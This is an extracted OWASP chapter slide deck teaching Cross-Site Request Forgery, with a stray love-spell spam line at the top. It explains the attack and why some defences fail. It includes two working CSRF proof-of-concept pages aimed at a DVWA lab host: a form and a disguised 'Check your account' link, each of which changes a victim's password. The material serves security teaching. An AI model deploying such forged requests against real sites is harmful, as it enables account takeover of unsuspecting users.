%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
Understanding CSRF
1. CROSS SITE REQUEST FORGERY
UNDERSTANDING
John Patrick Lita - OWASP Manila Chapter President
Venue: Philippine Army, Cyber Security Division, Taguig City
OWASP Taguig Chapter
2. DEEP UNDERSTANDING WITH CSRF VULNERABILITY
MEET THE PRESENTER
OWASP Manila Chapter President
Project Manager at Enterprise Linux Professionals
Owner of Active Security Training and Consultancy
Project leader for
OWASP Online Academy
john.patrick.lita@owasp.org
2
3. DEEP UNDERSTANDING WITH CSRF VULNERABILITY
CROSS SITE REQUEST FORGERY
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute
unwanted actions on a web application in which they're currently authenticated. CSRF
attacks specifically target state-changing requests, not theft of data, since the attacker
has no way to see the response to the forged request. With a little help of social
engineering (such as sending a link via email or chat), an attacker may trick the users
of a web application into executing actions of the attacker's choosing. If the victim is a
normal user, a successful CSRF attack can force the user to perform state changing
requests like transferring funds, changing their email address, and so forth. If the
victim is an administrative account, CSRF can compromise the entire web application.
3
4. DEEP UNDERSTANDING WITH CSRF VULNERABILITY
CSRF ILLUSTRATION
4
C
Regular Form CSRF Form Template
COMMENT HERE: COMMENT HERE:
POST POST
5. DEEP UNDERSTANDING WITH CSRF VULNERABILITY
CSRF ILLUSTRATION
5
C
Regular Form CSRF Form Template
COMMENT HERE: COMMENT HERE:
POST POST
I AM AWESOME!
6. DEEP UNDERSTANDING WITH CSRF VULNERABILITY
CSRF ILLUSTRATION
6
C
Regular Form CSRF Form Template
COMMENT HERE: COMMENT HERE:
POST POST
I AM AWESOME!
Jaypee: I AM AWESOME!
7. DEEP UNDERSTANDING WITH CSRF VULNERABILITY
CSRF ILLUSTRATION
7
C
Regular Form CSRF Form Template
COMMENT HERE: COMMENT HERE:
POST POST
I AM NOOB!
8. DEEP UNDERSTANDING WITH CSRF VULNERABILITY
CSRF ILLUSTRATION
8
C
Regular Form CSRF Form Template
COMMENT HERE: COMMENT HERE:
POST POST
I AM NOOB!
9. DEEP UNDERSTANDING WITH CSRF VULNERABILITY
CSRF ILLUSTRATION
9
C
Regular Form CSRF Form Template
COMMENT HERE: COMMENT HERE:
POST POST
I AM NOOB!
Jaypee: I AM NOOB!
15. PREVENTION MEASURES THAT DO NOT WORK
CSRF TEMPLATE WEB INTERFACE
Try to copy the code of the CSRF Template and save it as HTML File. then open the file with any
browser you like. then click the submit and analyse the behaviour.
After that try yo login. please proceed to next page for source code. Page 16
15
16. PREVENTION MEASURES THAT DO NOT WORK
CSRF TEMPLATE SOURCE CODE
<!DOCTYPE html>
<html>
<head>
<title>CSRF Template</title>
</head>
<body>
<br>
<form action="http://172.16.157.129/dvwa/vulnerabilities/csrf/?" method="GET"> New Password:<br>
<input type="password" AUTOCOMPLETE="off" name="password_new" value="12345"><br>
Confirm New Password: <br>
<input type="password" AUTOCOMPLETE="off" name="password_conf" value="12345"><br>
<input type="submit" value="Change" name="Change">
</form>
</body>
</html>
16
17. PREVENTION MEASURES THAT DO NOT WORK
PREVENTION MEASURES THAT DO NOT WORK
▸ Using a secret cookie
▸ Remember that all cookies, even the secret ones, will be submitted with every request. All
authentication tokens will be submitted regardless of whether or not the end-user was tricked
into submitting the request. Furthermore, session identifiers are simply used by the application
container to associate the request with a specific session object. The session identifier does not
verify that the end-user intended to submit the request.
17
18. PREVENTION MEASURES THAT DO NOT WORK
PREVENTION MEASURES THAT DO NOT WORK
▸ Only Accept POST requests
▸ Applications can be developed to only accept POST requests for the execution of business logic. The
misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be
executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can
trick a victim into submitting a forged POST request, such as a simple form hosted in an attacker's
Website with hidden values. This form can be triggered automatically by JavaScript or can be
triggered by the victim who thinks the form will do something else.
POST
REQUEST
18
19. PREVENTION MEASURES THAT DO NOT WORK
PREVENTION MEASURES THAT DO NOT WORK
▸ Multi-Step Transaction
Multi-Step transactions are not an adequate prevention of CSRF. As
long as an attacker can predict or deduce each step of the completed
transaction, then CSRF is possible.
▸ URL Rewriting
This might be seen as a useful CSRF prevention technique as the
attacker cannot guess the victim's session ID. However, the user’s
session ID is exposed in the URL. We don't recommend fixing one
security flaw by introducing another.
▸ HTTPS
HTTPS does nothing to defend against CSRF.
19
21. PREVENTION MEASURES THAT DO NOT WORK
CSRF ATTACK USING SOCIAL ENGINEERING
One of the technique or attack vector is to perform a click jacking attack, to test this attack please
proceed on the next page for the source code, then try to executing it by clicking the “Click Here!”
21
22. PREVENTION MEASURES THAT DO NOT WORK
CSRF ATTACK USING SOCIAL ENGINEERING
<!DOCTYPE html>
<html>
<title>Please Check your Account Here!</title>
<head>Check your account Here!</head>
<body>
<a href="http://172.16.157.129/dvwa/vulnerabilities/csrf/?
password_new=password&password_conf=password&Change=Change#">Click Here!</a>
</body>
</html>